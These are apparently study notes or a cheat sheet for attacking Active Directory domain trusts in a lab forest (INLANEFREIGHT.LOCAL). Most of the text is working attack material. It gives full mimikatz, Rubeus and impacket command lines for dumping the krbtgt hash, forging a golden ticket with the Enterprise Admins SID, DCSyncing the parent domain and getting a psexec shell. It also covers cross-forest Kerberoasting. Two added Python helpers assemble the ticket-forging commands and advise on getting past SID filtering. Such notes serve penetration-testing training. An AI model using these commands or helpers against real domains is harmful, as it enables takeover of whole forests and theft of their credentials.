Domain Trust Enumeration
Enumerate Domain Trusts (PowerView)
Show Existing Trusts
Get-DomainTrust
Show Trust Mapping
Get-DomainTrustMapping
Show Users in the Child Domain
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
Attacking Domain Trusts - Child -> Parent (Windows)
To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
With this data collected, the attack can be performed with Mimikatz or Rubeus. It works because the forged TGT carries the root domain's Enterprise Admins SID in its ExtraSids, and SID filtering is not applied across a parent-child (intra-forest) trust, so the parent domain's DCs honour it.
1 Obtaining KRBTGT NT Hash
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
2 Obtaining SID Child Domain
Get-DomainSID
3 Name Target User
# Can be a fake username (the ticket is forged, so the account does not need to exist)
4 FQDN Child Domain
Get-DomainTrust
5 SID Enterprise Admins Group
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
6 Putting It All Together
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus Way
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
7 Confirm Ticket
# List Tickets (the forged TGT for hacker@LOGISTICS.INLANEFREIGHT.LOCAL should be in the cache)
klist
8 DCSync the Parent Domain
# Mimikatz: target an account in the root domain; /domain: makes mimikatz talk to a DC of the parent
lsadump::dcsync /user:INLANEFREIGHT\<target user> /domain:INLANEFREIGHT.LOCAL
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
1 Get KRBTGT NT Hash
# Run against a DC of the child domain with a child-domain admin account
secretsdump.py logistics.inlanefreight.local/<user>@<child-dc> -just-dc-user LOGISTICS/krbtgt
2 Get SID Child Domain
lookupsid.py logistics.inlanefreight.local/<user>@<child-dc> | grep "Domain SID"
3 Name Target User
# Can be any name (the account does not need to exist)
4 Get SID Enterprise Admins
# Run against a DC of the root domain: Enterprise Admins only exists there, and the "Domain SID is:" line
# that grep -B12 pulls in is the root domain's SID, so the group SID is <root domain SID>-519
lookupsid.py logistics.inlanefreight.local/<user>@<root-dc> | grep -B12 "Enterprise Admins"
5 Putting it all Together
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
6 Export ccache
export KRB5CCNAME=hacker.ccache
7 Get Shell
# -k -no-pass uses the ticket in KRB5CCNAME; the host part must be the root DC's Kerberos name, -target-ip its address
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@<root-dc-fqdn> -k -no-pass -target-ip 172.16.5.5
Automatic Way
# raiseChild.py chains every step above, then dumps the forest root's admin credentials and runs psexec on -target-exec; quick but noisy
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
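The grep -B12 trick in step 4 breaks as soon as lookupsid.py prints a different number of RIDs before "Enterprise Admins". The helper below, an added example that is not part of the original page, parses lookupsid.py output directly, derives the child domain SID and the root domain's Enterprise Admins SID (RID 519), refuses output that did not come from a root-domain DC, and assembles the ticketer.py (step 5) and mimikatz kerberos::golden (Windows step 6) command lines. The two lookupsid.py outputs are constructed samples in that tool's print format, using the SIDs from this page; the child-DC hostname in them is a placeholder.

```python
import re

# Constructed sample output in lookupsid.py's format (not real lab output).
# Run #1: against the child domain DC (hostname is a placeholder).
CHILD_DC_OUTPUT = """\
[*] Brute forcing SIDs at child-dc.logistics.inlanefreight.local
[*] StringBinding ncacn_np:child-dc.logistics.inlanefreight.local[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
498: LOGISTICS\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: LOGISTICS\\Administrator (SidTypeUser)
502: LOGISTICS\\krbtgt (SidTypeUser)
512: LOGISTICS\\Domain Admins (SidTypeGroup)
"""
# Run #2: against the forest root DC (172.16.5.5 on this page).
ROOT_DC_OUTPUT = """\
[*] Brute forcing SIDs at 172.16.5.5
[*] StringBinding ncacn_np:172.16.5.5[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
498: INLANEFREIGHT\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\\Administrator (SidTypeUser)
512: INLANEFREIGHT\\Domain Admins (SidTypeGroup)
519: INLANEFREIGHT\\Enterprise Admins (SidTypeGroup)
"""

ENTERPRISE_ADMINS_RID = 519
DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21-\d+-\d+-\d+)")
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")


def parse_lookupsid(output):
    """Return (domain_sid, {rid: (netbios, name, sid_type)}) from lookupsid.py output."""
    domain_sid, entries = None, {}
    for line in output.splitlines():
        m = DOMAIN_SID_RE.search(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line.strip())
        if m:
            rid, netbios, name, kind = m.groups()
            entries[int(rid)] = (netbios, name, kind)
    if domain_sid is None:
        raise ValueError("no 'Domain SID is:' line in lookupsid.py output")
    return domain_sid, entries


def enterprise_admins_sid(root_dc_output):
    """Root domain SID + RID 519. Fails if the output came from a child DC (no RID 519 there)."""
    domain_sid, entries = parse_lookupsid(root_dc_output)
    entry = entries.get(ENTERPRISE_ADMINS_RID)
    if entry is None or entry[1] != "Enterprise Admins":
        raise ValueError("RID 519 not present: this output is not from a forest-root DC")
    return f"{domain_sid}-{ENTERPRISE_ADMINS_RID}"


def golden_ticket_params(krbtgt_nthash, child_fqdn, child_dc_output, root_dc_output, user="hacker"):
    """Collect and sanity-check the five inputs the child -> parent attack needs."""
    if not re.fullmatch(r"[0-9a-fA-F]{32}", krbtgt_nthash):
        raise ValueError("krbtgt NT hash must be 32 hex characters")
    child_sid, _ = parse_lookupsid(child_dc_output)
    ea_sid = enterprise_admins_sid(root_dc_output)
    if ea_sid.startswith(child_sid + "-"):
        raise ValueError("Enterprise Admins SID resolved inside the child domain; wrong DC queried")
    return {"nthash": krbtgt_nthash.lower(), "domain": child_fqdn,
            "domain_sid": child_sid, "extra_sid": ea_sid, "user": user}


def build_ticketer_cmd(params):
    """impacket ticketer.py argv (Linux step 5)."""
    return ["ticketer.py", "-nthash", params["nthash"], "-domain", params["domain"],
            "-domain-sid", params["domain_sid"], "-extra-sid", params["extra_sid"], params["user"]]


def build_mimikatz_cmd(params):
    """mimikatz kerberos::golden line (Windows step 6)."""
    return (f"kerberos::golden /user:{params['user']} /domain:{params['domain']} "
            f"/sid:{params['domain_sid']} /krbtgt:{params['nthash']} /sids:{params['extra_sid']} /ptt")


if __name__ == "__main__":
    p = golden_ticket_params("9d765b482771505cbe97411065964d5f", "LOGISTICS.INLANEFREIGHT.LOCAL",
                             CHILD_DC_OUTPUT, ROOT_DC_OUTPUT)
    print(" ".join(build_ticketer_cmd(p)))
    print(build_mimikatz_cmd(p))
```

In a real engagement, pipe each lookupsid.py run into a file and pass the file contents in; the check that RID 519 resolves to "Enterprise Admins" is what catches the common mistake of querying the child DC for the root group's SID.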
Cross-Forest Kerberoasting
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Admin Password Reuse & Group Membership
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName <SID>
# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
SID History Abuse
# Unlike the child -> parent case, SID filtering is enabled by default on forest trusts: SID history entries pointing into the other forest are dropped
# unless SID history was explicitly enabled on the trust, and even then only SIDs with RID >= 1000 survive, so well-known groups (512, 519) cannot be spoofed
![[Pasted image 20230428181936.png]]
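To make the difference between the child -> parent attack above and cross-forest SID history abuse concrete, here is an added example (not code from the original page) that models which ExtraSids/SID-history entries survive a trust hop. It is a deliberately simplified model of SID filtering: intra-forest trusts keep everything; a forest trust keeps only SIDs from domains the trusted forest may vouch for, and admits foreign SIDs only when SID history is enabled on the trust and the RID is 1000 or higher. The LOGISTICS and INLANEFREIGHT domain SIDs come from this page; the target-forest SID and its RID-1105 group are constructed placeholders.

```python
ENTERPRISE_ADMINS_RID = 519
DOMAIN_ADMINS_RID = 512

# Domain SIDs from this page.
CHILD_SID = "S-1-5-21-2806153819-209893948-922872689"        # LOGISTICS.INLANEFREIGHT.LOCAL
ROOT_SID = "S-1-5-21-3842939050-3880317879-2865463114"       # INLANEFREIGHT.LOCAL (forest root)
# Constructed placeholder for the other forest (stands in for FREIGHTLOGISTICS.LOCAL).
TARGET_FOREST_SID = "S-1-5-21-1111111111-2222222222-3333333333"


def split_sid(sid):
    """'S-1-5-21-a-b-c-RID' -> ('S-1-5-21-a-b-c', RID)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def surviving_sids(extra_sids, trust_type, trusted_forest_domains, sid_history_enabled=False):
    """Simplified model (assumption, not an implementation of Windows' filter) of the
    ExtraSids the trusting side keeps when a ticket crosses a trust.

    trust_type: "intra-forest" (parent-child or tree-root) or "forest".
    trusted_forest_domains: domain SIDs the trusted forest is allowed to vouch for.
    """
    if trust_type == "intra-forest":
        return list(extra_sids)            # no SID filtering: root EA-519 in a child TGT is honoured
    if trust_type != "forest":
        raise ValueError(f"unknown trust type: {trust_type}")
    kept = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain in trusted_forest_domains:
            kept.append(sid)               # SIDs of the trusted forest's own domains pass
        elif sid_history_enabled and rid >= 1000:
            kept.append(sid)               # foreign SID admitted only for non-well-known RIDs
        # everything else (foreign well-known groups such as 512/519) is filtered
    return kept


def demo():
    """Three scenarios: the page's child -> parent attack, and SID history against a forest trust."""
    ea_root = f"{ROOT_SID}-{ENTERPRISE_ADMINS_RID}"
    foreign_da = f"{TARGET_FOREST_SID}-{DOMAIN_ADMINS_RID}"
    foreign_custom = f"{TARGET_FOREST_SID}-1105"               # constructed custom group, RID >= 1000
    our_forest = {CHILD_SID, ROOT_SID}
    return {
        "child_to_parent": surviving_sids([ea_root], "intra-forest", our_forest),
        "forest_default": surviving_sids([foreign_da, foreign_custom], "forest", our_forest),
        "forest_sidhistory": surviving_sids([foreign_da, foreign_custom], "forest", our_forest,
                                            sid_history_enabled=True),
    }


if __name__ == "__main__":
    for name, sids in demo().items():
        print(f"{name}: {sids or 'nothing survives'}")
```

The practical reading: against a forest trust, check whether SID history is enabled (PowerView's Get-DomainTrust shows the trust attributes) and, if it is, target a group in the other forest with RID 1000 or above that is itself privileged there, rather than Domain Admins or Enterprise Admins.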
Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)
Cross-Forest Kerberoasting
# Using -target-domain: request TGS tickets for SPN accounts in the trusted forest with credentials from our own domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley